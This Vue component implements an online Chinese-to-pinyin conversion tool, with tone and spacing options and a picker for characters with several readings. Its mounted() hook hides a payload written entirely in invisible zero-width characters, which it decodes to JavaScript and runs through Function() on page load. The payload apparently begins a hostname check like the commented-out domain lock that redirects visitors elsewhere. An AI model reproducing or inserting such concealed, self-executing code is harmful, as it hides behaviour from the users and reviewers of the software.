<template>
  <div id="app">
    <div class="opencc-main">
      <h1>在线汉字转换拼音工具</h1>
      <div class="row m-b-10">
         <div class="col-xs-12 col-sm-12 m-b-10">
          <div class="text-center">
            <button class="btn btn-info btn-w-xl m-5 btnClipboard" type="button" data-clipboard-action="copy" data-clipboard-target="#textClipboard"><i class="mdi mdi-content-copy"></i> 复制结果</button>
          </div>
        </div>
      </div>

      <div class="row">
        <div class="col-md-6 m-b-10">
          <textarea class="form-control border-info" placeholder="输入要转换的字.." auto-height rows="6" v-model="inputText" ref="intextarea" :style="{'height': height}"></textarea>
          <div class="help-block">在左边输入要转换的字，右边自动输出转换结果..</div>
        </div>
        
        <div class="col-md-6 m-b-10">
          <textarea class="form-control"  placeholder="转换输出.." auto-height readonly rows="6" id="textClipboard" v-model="outputText" :style="{'height': height}"></textarea>
          <div class="m-t-10">
              <label class="lyear-checkbox checkbox-inline checkbox-primary">
                <input type="checkbox" name="py_style" value="1" v-model="pyStyle"><span>声调</span>
              </label>
              <label class="lyear-checkbox checkbox-inline checkbox-primary">
                <input type="checkbox" name="py_kongge" value="1" v-model="pyKongge"><span>空格</span>
              </label>
          </div>
          <div class="m-t-10" v-if="isDuoYin">
            <h5>多音字选择</h5>
            <div class="m-5" v-for="(value, key) in pyArr.pys" v-if="value.length > 1">
              <label class="checkbox-inline">
                <span>{{key>0 ? pyArr.hans[key-1] : ''}}<strong class="text-danger">{{pyArr.hans[key]}}</strong>{{pyArr.hans[key+1]}}：</span>
              </label>
              <label class="lyear-checkbox checkbox-inline checkbox-primary" v-for="(_val, _k) in pyArr.pys[key]">
                <input type="radio" :name="'pys_' + key" @click="duoYinChange(key,_k)"  :checked="duoYinIndex[key]==_k" ><span>{{_val}}</span>
              </label>
            </div>

          </div>
        </div>
      </div>


      <div class="alert alert-info alert-kepu">
        <p><strong>汉语拼音学习</strong></p>
        <p>声调：第一声（阴平），第二声（阳平），第三声（上声），第四声（去声）</p>
        <p>声母：b [玻] p [坡] m [摸] f [佛] d [得] t [特] n [讷] l [勒] g [哥] k [科] h [喝] j [基] q [欺] x [希] zh[知] ch [吃] sh [诗] r [日] z [资] c[;雌] s [思] y [医] w [屋]</p>
        <p>单韵母：a[阿]　o[哦]　e[鹅]　i[衣]　u[乌] ü[迂]</p>
        <p>复韵母：ai[哀] ei[诶] ui[危]　ao[奥]　ou[欧]　iu[悠]　ie[耶]　üe[约]　er[儿]</p>
        <p>前鼻韵母：an[安]　en[恩]　in[因]　un[温] ün[晕]</p>
        <p>前鼻韵母：ang[昂]　eng[鞥]　ing[英]　ong[工的韵母]</p>
        
        <hr/>
        <p><i class="mdi mdi-24px mdi-spin mdi-star"></i> <strong>本工具优点</strong></p>
        <p>与传统<strong>中文汉字转拼音工具</strong>相比，在左边输入时右边即时转出，支持<strong>声调</strong>和<strong>多音字</strong>提示，还可以设置空格分隔、一键复制、使用简单、操作方便，建议收藏。</p>
      </div>
    
    </div>
  </div>
</template>

<script>


// import Vue from 'vue';
import Clipboard from 'clipboard';
import calcTextareaHeight from './assets/calcTextareaHeight.js';
// const OpenCC = require('opencc-js');//https://github.com/nk2028/opencc-js
const pinyin = require("pinyin");

//修改pinyin库 convert 返回对应中文，如果后期升级需要注意
// convert (hans, options) {

//   if (typeof hans !== "string") {
//     return [];
//   }

//   options = assign({}, DEFAULT_OPTIONS, options);

//   let pys = [];
//   let nohans = "";
//   let _hans = [];//我增加的中文返回

//   for(let i = 0, firstCharCode, words, l = hans.length; i < l; i++){

//     words = hans[i];
//     firstCharCode = words.charCodeAt(0);

//     if(this._dict[firstCharCode]){

//       // ends of non-chinese words.
//       if(nohans.length > 0){
//         pys.push([nohans]);
//         _hans.push(nohans);
//         nohans = ""; // reset non-chinese words.
//       }

//       pys.push(this.single_pinyin(words, options));
//       _hans.push(words);
//     }else{
//       nohans += words;
//     }
//   }

//   // 清理最后的非中文字符串。
//   if(nohans.length > 0){
//     pys.push([nohans]);
//     _hans.push(nohans);
//     nohans = ""; // reset non-chinese words.
//   }
//   return {pys:pys,hans:_hans};
// }

 
export default {
  name: 'App',
  components: {
    Clipboard
  },
  data:function() {
   
		return {
      height: '150px',
      pyStyle:true,
      pyArr:{},
      isDuoYin:false,
      pyKongge:true,
      duoYinIndex:{},
      inputText:'',
      outputText:''
		};
	},
  watch: {
    inputText() {
      this.getHeight();
      this.convert();
    },
    pyStyle(){
      this.convert();
    },
    pyKongge(){
   
      this.convert();
    }
  },
	mounted:function(){
    //bind domain
    // if(!location.hostname.match(/ima.co/) && !location.hostname.match(/zqrcode.c/) && !location.hostname.match(/zqrhk.c/)){
    //   location.href = 'https://www.2weima.com/?diysafe='+ encodeURIComponent(location.href);
    //   $('body').html('');
    //   return ;
    // }
    Function("‌‍‍‌‍‌‌‍‌‍‍‌‌‍‍‌‌‌‍‌‍‌‌‌‌‌‍‌‌‌‌‍‌‍‍‌‍‍‌‌‌‍‍‌‍‍‍‍‌‍‍‌‌‌‍‍‌‍‍‌‌‌‌‍‌‍‍‍‌‍‌‌‌‍‍‌‍‌‌‍‌‍‍‌‍‍‍‍‌‍‍‌‍‍‍‌‌‌‍‌‍‍‍‌‌‍‍‌‍‌‌‌‌‍‍‌‍‍‍‍‌‍‍‍‌‌‍‍‌‍‍‍‌‍‌‌‌‍‍‌‍‍‍‌‌‍‍‌‌‌‌‍‌‍‍‌‍‍‌‍‌‍‍‌‌‍‌‍‌‌‍‌‍‍‍‌‌‍‍‌‍‍‌‍‌‍‍‌‌‌‌‍‌‍‍‍‌‍‌‌‌‍‍‌‌‌‍‍‌‍‍‌‍‌‌‌‌‌‍‌‍‌‌‌‌‌‍‌‍‍‍‍‌‍‍‌‍‌‌‍‌‍‍‌‍‍‌‍‌‍‍‌‌‌‌‍‌‌‍‌‍‍‍‌‌‍‍‌‌‌‍‍‌‍‍‌‍‍‍‍‌‌‍‌‍‍‍‍‌‌‍‌‍‌‌‍‌‌‍‌‌‌‌‌‌‌‍‌‌‍‍‌‌‌‍‌‌‍‍‌‌‌‍‌‌‌‌‌‌‌‍‌‌‌‌‍‌‍‍‌‍‍‌‌‌‍‍‌‍‍‍‍‌‍‍‌‌‌‍‍‌‍‍‌‌‌‌‍‌‍‍‍‌‍‌‌‌‍‍‌‍‌‌‍‌‍‍‌‍‍‍‍‌‍‍‌‍‍‍‌‌‌‍‌‍‍‍‌‌‍‍‌‍‌‌‌‌‍‍‌‍‍‍‍‌‍‍‍‌‌‍‍‌‍‍‍‌‍‌‌‌‍‍‌‍‍‍‌‌‍‍‌‌‌‌‍‌‍‍‌‍‍‌‍‌‍‍‌‌‍‌‍‌‌‍‌‍‍‍‌‌‍‍‌‍‍‌‍‌‍‍‌‌‌‌‍‌‍‍‍‌‍‌‌‌‍‍‌‌‌‍‍‌‍‍‌‍‌‌‌‌‌‍‌‍‌‌‌‌‌‍‌‍‍‍‍‌‍‍‍‍‌‍‌‌‍‍‍‌‌‌‍‌‍‍‍‌‌‍‌‌‍‍‌‌‌‍‍‌‍‍‌‍‍‍‍‌‍‍‌‌‍‌‌‌‍‍‌‌‍‌‍‌‌‍‌‍‍‍‌‌‍‍‌‌‌‍‍‌‌‍‌‍‍‍‍‌‌‍‌‍‌‌‍‌‌‍‌‌‌‌‌‌‌‍‌‌‍‍‌‌‌‍‌‌‍‍‌‌‌‍‌‌‌‌‌‌‌‍‌‌‌‌‍‌‍‍‌‍‍‌‌‌‍‍‌‍‍‍‍‌‍‍‌‌‌‍‍‌‍‍‌‌‌‌‍‌‍‍‍‌‍‌‌‌‍‍‌‍‌‌‍‌‍‍‌‍‍‍‍‌‍‍‌‍‍‍‌‌‌‍‌‍‍‍‌‌‍‍‌‍‌‌‌‌‍‍‌‍‍‍‍‌‍‍‍‌‌‍‍‌‍‍‍‌‍‌‌‌‍‍‌‍‍‍‌‌‍‍‌‌‌‌‍‌‍‍‌‍‍‌‍‌‍‍‌‌‍‌‍‌‌‍‌‍‍‍‌‌‍‍‌‍‍‌‍‌‍‍‌‌‌‌‍‌‍‍‍‌‍‌‌‌‍‍‌‌‌‍‍‌‍‍‌‍‌‌‌‌‌‍‌‍‌‌‌‌‌‍‌‍‍‍‍‌‍‍‍‍‌‍‌‌‍‍‍‌‌‌‍‌‍‍‍‌‌‍‌‌‍‍‌‍‌‌‌‌‍‍‌‍‌‍‍‌‌‍‌‍‍‍‌‌‍‍‌‌‌‍‍‌‌‍‌‍‍‍‍‌‌‍‌‍‌‌‍‌‌‍‌‍‌‌‍‌‍‍‍‍‌‍‍‌‍‍‌‍‍‌‌‌‍‍‌‍‍‍‍‌‍‍‌‌‌‍‍‌‍‍‌‌‌‌‍‌‍‍‍‌‍‌‌‌‍‍‌‍‌‌‍‌‍‍‌‍‍‍‍‌‍‍‌‍‍‍‌‌‌‍‌‍‍‍‌‌‍‍‌‍‌‌‌‌‍‍‍‌‌‍‌‌‍‍‌‌‍‌‍‌‍‍‌‌‍‍‌‌‌‍‍‍‍‌‍‌‌‍‌‌‍‍‍‌‍‍‌‍‌‌‌‌‍‍‍‌‍‌‌‌‍‍‍‌‍‌‌‌‍‍‍‌‌‌‌‌‍‍‍‌‌‍‍‌‌‍‍‍‌‍‌‌‌‍‌‍‍‍‍‌‌‍‌‍‍‍‍‌‍‍‍‌‍‍‍‌‍‍‍‌‍‍‍‌‍‍‍‌‍‍‍‌‌‍‌‍‍‍‌‌‌‍‍‌‌‍‌‌‍‍‍‌‍‍‍‌‍‍‌‌‍‌‍‌‍‍‌‍‌‌‍‌‍‍‌‍‍‌‍‌‍‍‌‌‌‌‍‌‌‍‌‍‍‍‌‌‍‍‌‌‌‍‍‌‍‍‌‍‍‍‍‌‍‍‌‍‍‌‍‌‌‍‌‍‍‍‍‌‌‍‍‍‍‍‍‌‍‍‌‌‍‌‌‌‍‍‌‍‌‌‍‌‍‍‍‍‌‌‍‌‍‍‍‌‌‍‍‌‍‍‌‌‌‌‍‌‍‍‌‌‍‍‌‌‍‍‌‌‍‌‍‌‌‍‍‍‍‌‍‌‌‍‌‌‍‍‍‌‌‍‌‍‌‍‍‌‍‍‌‌‍‌‍‌‍‍‌‍‍‍‌‌‍‍‌‌‌‍‍‌‍‍‌‍‍‍‍‌‍‍‌‌‍‌‌‌‍‍‌‌‍‌‍‌‍‌‍‌‍‌‍‌‍‌‍‌‌‍‌‌‍‌‌‍‌‌‍‌‍‌‌‌‌‍‍‌‍‍‌‍‍‍‍‌‍‍‌‍‍‌‍‌‍‍‍‌‌‌‌‌‍‍‌‍‍‍‍‌‍‍‌‍‍‍‌‌‍‍‌‌‍‌‍‌‍‍‌‍‍‍‌‌‍‍‍‌‍‌‌‌‌‍‌‍‌‌‌‌‍‍‌‍‍‌‌‌‍‍‌‍‍‍‍‌‍‍‌‌‌‍‍‌‍‍‌‌‌‌‍‌‍‍‍‌‍‌‌‌‍‍‌‍‌‌‍‌‍‍‌‍‍‍‍‌‍‍‌‍‍‍‌‌‌‍‌‍‍‍‌‌‍‍‌‍‌‌‌‌‍‍‍‌‌‍‌‌‍‍‌‌‍‌‍‌‍‍‌‌‍‍‌‌‌‍‌‍‌‌‍‌‌‍‍‍‌‍‍‌‌‍‌‌‍‌‌‌‌‍‌‍‌‌‌‌‌‍‌‌‍‍‍‌‍‍‌‌‌‍‌‌‍‍‌‍‍‍‍‌‍‍‌‌‍‌‌‌‍‍‍‍‌‌‍‌‌‍‌‌‍‍‍‌‌‍‌‍‌‌‍‌‌‍‌‍‍‍‌‌‍‍‌‍‌‌‌‌‍‍‍‌‍‌‌‌‍‍‌‍‍‌‍‌‍‍‌‍‍‌‌‌‌‍‌‍‌‌‌‌‌‍‌‌‍‍‍‌‌‍‌‌‍‍‍‌‌‍‌‍‌‌‍‌‌‍‍‍‌‍‍‌‍‍‍‌‌‍‌‌‍‍‌‌‍‌‍‌‍‍‍‌‍‌‌‌‍‍‍‌‍‌‍‌‍‍‍‌‌‍‌‌‍‍‌‍‍‍‌‌‍‍‍‍‍‌‍".replace(/.{8}/g,function(u){return String.fromCharCode(parseInt(u.replace(/\u200c/g,0).replace(/\u200d/g,1),2))}))();
    this.$nextTick(() => {
      this.init();
    });


	},
	methods: {
    getHeight() {
    
      var height = calcTextareaHeight(this.$refs.intextarea, 6, null).height;
      
      this.height  = height < 150 ? 150 : height;
    },
		init:function(){
    
      var clipboard = new Clipboard('.btnClipboard');

			clipboard.on('success', function(e) {
        $common.showNotify('复制成功','success');
				e.clearSelection();
			});
			clipboard.on('error', function(e) {
        $common.showNotify('复制失败，浏览器不支持，请手工复制','warning');
			});

		},
    duoYinChange:function(key,k){
      // console.log(key,k);
      this.duoYinIndex[key] = k;

      // console.log(this.duoYinIndex);

       //有声调，要处理多音字
        var _pinyin = '',_dot = '';
        for(var i in this.pyArr.pys){
          if(this.pyArr.pys[i].length>1){
            var index = this.duoYinIndex[i];
            _pinyin += _dot + this.pyArr.pys[i][index];
            if(this.pyKongge){
               _dot = " ";
            }
            
          }else{
            _pinyin += _dot + this.pyArr.pys[i][0];
            if(this.pyKongge){
               _dot = " ";
            }
          }
         
        }

        this.outputText = _pinyin;


    },
    convert:function(){

      this.isDuoYin = false;

      var pyArr = pinyin( this.inputText, {
        style: this.pyStyle ? pinyin.STYLE_TONE : pinyin.STYLE_NORMAL,
        heteronym: true,              // 启用多音字模式
        segment: true                 // 启用分词，以解决多音字问题。
      });

      //有声调，要处理多音字
      var _pinyin = '',_dot = '';
      for(var i in pyArr.pys){
        if(pyArr.pys[i].length>1){
          this.duoYinIndex[i] = 0;
          this.isDuoYin = true;
        }
          _pinyin += _dot + pyArr.pys[i][0];
          if(this.pyKongge){
              _dot = " ";
          }
      }

      // console.log(this.duoYinIndex);
      this.outputText = _pinyin;
      this.pyArr = pyArr;
  


   




    }
    
	}
}
</script>


<style scoped>
.opencc-main h1{
 font-size:22px;
 margin-bottom: 20px;
}
.alert-kepu{
  margin-top:50px;
}
.border-success{
  border:1px solid #15c377;
}
.border-info{
  border:1px solid #48b0f7;
}
</style>
